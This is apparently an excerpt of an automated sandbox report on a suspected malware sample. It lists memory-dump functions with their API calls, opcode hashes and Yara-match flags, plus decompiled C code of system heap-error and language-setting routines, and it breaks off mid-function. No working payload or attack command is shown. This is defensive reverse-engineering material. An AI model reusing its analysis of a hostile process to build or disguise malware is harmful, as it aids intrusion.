                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8d5f5560aecf97c07ce3b2702cd6c0390a4f8a1f7eb397a8b2a7c52e083641d7
                                              • Instruction ID: cdd2eec4020fea086f6a144f2455970ee5c7f47f7fbe583e1b3f496f5aa23b15
                                              • Opcode Fuzzy Hash: 8d5f5560aecf97c07ce3b2702cd6c0390a4f8a1f7eb397a8b2a7c52e083641d7
                                              • Instruction Fuzzy Hash: 5C90027161110802D1807199441464A4085A7D1342FD1C015A0055654DCA558A6977E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                              • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                              • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                              • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004188E2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                              • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateExitFreeProcess
                                              • String ID: 65A
                                              • API String ID: 725053265-2085483392
                                              • Opcode ID: b5966d64cfa625804b80cc4b0e66dc486d175339082e2e998d04b5d5827ebc5a
                                              • Instruction ID: 9c3963d56414f175e01917e4060537cab4c436d14e3d85f34ddb164a983611f4
                                              • Opcode Fuzzy Hash: b5966d64cfa625804b80cc4b0e66dc486d175339082e2e998d04b5d5827ebc5a
                                              • Instruction Fuzzy Hash: F8F08CB2204204AFDB04DF68DC84EEB3769EF98354F01855AF81897241CA31EA10CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: 65A
                                              • API String ID: 1279760036-2085483392
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                              • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                              • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418A43, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c30af80c3aceb8291dbcb64bf18b81751b4d6adf1fcda52649cf80eee8412512
                                              • Instruction ID: 37e891c76849951da78b93b5df8a188ef4dbd3704d8e8d4c52fa450291bb30fa
                                              • Opcode Fuzzy Hash: c30af80c3aceb8291dbcb64bf18b81751b4d6adf1fcda52649cf80eee8412512
                                              • Instruction Fuzzy Hash: 21E022B16082842BEB10DF29CC85ED73FA8DF4A250F14869EFC881B103C839A805CBB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418924, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 35a55681eae33743cd0d6057b91a7961325ecede7546be1e6f30bada71947c7b
                                              • Instruction ID: 3d0636d200e137f4749ad09701b0b51fa855c974d35d62143ff315f7ff40091e
                                              • Opcode Fuzzy Hash: 35a55681eae33743cd0d6057b91a7961325ecede7546be1e6f30bada71947c7b
                                              • Instruction Fuzzy Hash: 4DE08C76604100BBD721DF58CC95FC737A8AF48390F2680A9B968AB281C630AE01CAE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0192967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                              • Instruction ID: 6d03cf7c32b9916c122347de86b11622598d43f9cfa442e57990470419eb66c3
                                              • Opcode Fuzzy Hash: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                              • Instruction Fuzzy Hash: FDB09B71D015D5C9D611D7A44608717798477D0746F56C061D1060641F4778C095F5F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 0199B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                              Download Yara Rule
                                              Strings
                                              • write to, xrefs: 0199B4A6
                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0199B2F3
                                              • The resource is owned exclusively by thread %p, xrefs: 0199B374
                                              • *** then kb to get the faulting stack, xrefs: 0199B51C
                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0199B484
                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B3D6
                                              • This failed because of error %Ix., xrefs: 0199B446
                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0199B476
                                              • an invalid address, %p, xrefs: 0199B4CF
                                              • The resource is owned shared by %d threads, xrefs: 0199B37E
                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0199B39B
                                              • Go determine why that thread has not released the critical section., xrefs: 0199B3C5
                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0199B47D
                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0199B53F
                                              • The critical section is owned by thread %p., xrefs: 0199B3B9
                                              • a NULL pointer, xrefs: 0199B4E0
                                              • *** enter .exr %p for the exception record, xrefs: 0199B4F1
                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0199B2DC
                                              • <unknown>, xrefs: 0199B27E, 0199B2D1, 0199B350, 0199B399, 0199B417, 0199B48E
                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0199B314
                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0199B323
                                              • *** An Access Violation occurred in %ws:%s, xrefs: 0199B48F
                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0199B352
                                              • *** enter .cxr %p for the context, xrefs: 0199B50D
                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B38F
                                              • The instruction at %p referenced memory at %p., xrefs: 0199B432
                                              • read from, xrefs: 0199B4AD, 0199B4B2
                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0199B305
                                              • *** Inpage error in %ws:%s, xrefs: 0199B418
                                              • The instruction at %p tried to %s , xrefs: 0199B4B6
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                              • API String ID: 0-108210295
                                              • Opcode ID: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                              • Instruction ID: 187ecbf06cdf2c6e3e739cf9e7891a9f02aaff3ed9e9abb190d71089d007591d
                                              • Opcode Fuzzy Hash: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                              • Instruction Fuzzy Hash: A3812531B41300FFEF21AA4EAC86D6B3B39EFA6B52F014048F50D9B252D2698601D772
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019A1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E019A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018EB150();
				} else {
					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x19d589c);
				E018EB150("Heap error detected at %p (heap handle %p)\n",  *0x19d58a0);
				_t27 =  *0x19d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M019A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018EB150();
				} else {
					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E018EB150("Error code: %d - %s\n",  *0x19d5898);
				_t113 =  *0x19d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018EB150("Parameter1: %p\n",  *0x19d58a4);
				}
				_t115 =  *0x19d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018EB150("Parameter2: %p\n",  *0x19d58a8);
				}
				_t117 =  *0x19d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018EB150("Parameter3: %p\n",  *0x19d58ac);
				}
				_t119 =  *0x19d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018EB150();
					} else {
						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19d58b4);
					E018EB150("Last known valid blocks: before - %p, after - %p\n",  *0x19d58b0);
				} else {
					_t120 =  *0x19d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018EB150();
				} else {
					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E018EB150("Stack trace available at %p\n", 0x19d58c0);
			}











                                              0x019a1c10
                                              0x019a1c16
                                              0x019a1c1e
                                              0x019a1c3d
                                              0x019a1c3e
                                              0x019a1c20
                                              0x019a1c35
                                              0x019a1c3a
                                              0x019a1c44
                                              0x019a1c55
                                              0x019a1c5a
                                              0x019a1c65
                                              0x019a1c67
                                              0x00000000
                                              0x019a1c6e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019a1c67
                                              0x019a1cdc
                                              0x019a1ce5
                                              0x019a1d04
                                              0x019a1d05
                                              0x019a1ce7
                                              0x019a1cfc
                                              0x019a1d01
                                              0x019a1d0b
                                              0x019a1d17
                                              0x019a1d1f
                                              0x019a1d25
                                              0x019a1d30
                                              0x019a1d4f
                                              0x019a1d50
                                              0x019a1d32
                                              0x019a1d47
                                              0x019a1d4c
                                              0x019a1d61
                                              0x019a1d67
                                              0x019a1d68
                                              0x019a1d6e
                                              0x019a1d79
                                              0x019a1d98
                                              0x019a1d99
                                              0x019a1d7b
                                              0x019a1d90
                                              0x019a1d95
                                              0x019a1daa
                                              0x019a1db0
                                              0x019a1db1
                                              0x019a1db7
                                              0x019a1dc2
                                              0x019a1de1
                                              0x019a1de2
                                              0x019a1dc4
                                              0x019a1dd9
                                              0x019a1dde
                                              0x019a1df3
                                              0x019a1df9
                                              0x019a1dfa
                                              0x019a1e00
                                              0x019a1e0a
                                              0x019a1e13
                                              0x019a1e32
                                              0x019a1e33
                                              0x019a1e15
                                              0x019a1e2a
                                              0x019a1e2f
                                              0x019a1e39
                                              0x019a1e4a
                                              0x019a1e02
                                              0x019a1e02
                                              0x019a1e08
                                              0x00000000
                                              0x00000000
                                              0x019a1e08
                                              0x019a1e5b
                                              0x019a1e7a
                                              0x019a1e7b
                                              0x019a1e5d
                                              0x019a1e72
                                              0x019a1e77
                                              0x019a1e95

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                              • API String ID: 0-2897834094
                                              • Opcode ID: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                              • Instruction ID: 7fc905fe641b585093c078973334c92c78366a21359bf8fbdd098d4ca127e475
                                              • Opcode Fuzzy Hash: 463937bb7d6bb47389da54ac2d48b4ed172b5dd83e8f7e20d12453faec466e24
                                              • Instruction Fuzzy Hash: A161A432916646DFD211AB49D489D2473F4EB04B71F9A847EF60DDF301D634DA888B8B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018F3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E018F3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E018F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E018F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E018F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E018F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E018F1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01904620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0192F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01931370(_t276, 0x18c4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0192BB40(0,  &_v68, _t170);
									if(L018F43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0192BB40(_t257,  &_v68, _t243);
								if(L018F43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01931370(_t278, 0x18c4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01904620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0192F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01931370(_v16, 0x18c4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0192BB40(_t262,  &_v68, _t244);
								if(L018F43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01931370(_t282, 0x18c4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0192BB40(_t262,  &_v68, _t201);
							if(L018F43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01904620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0192F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01931370(_t280, 0x18c4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0192BB40(_t267,  &_v68, _t245);
							if(L018F43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01931370(_t284, 0x18c4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
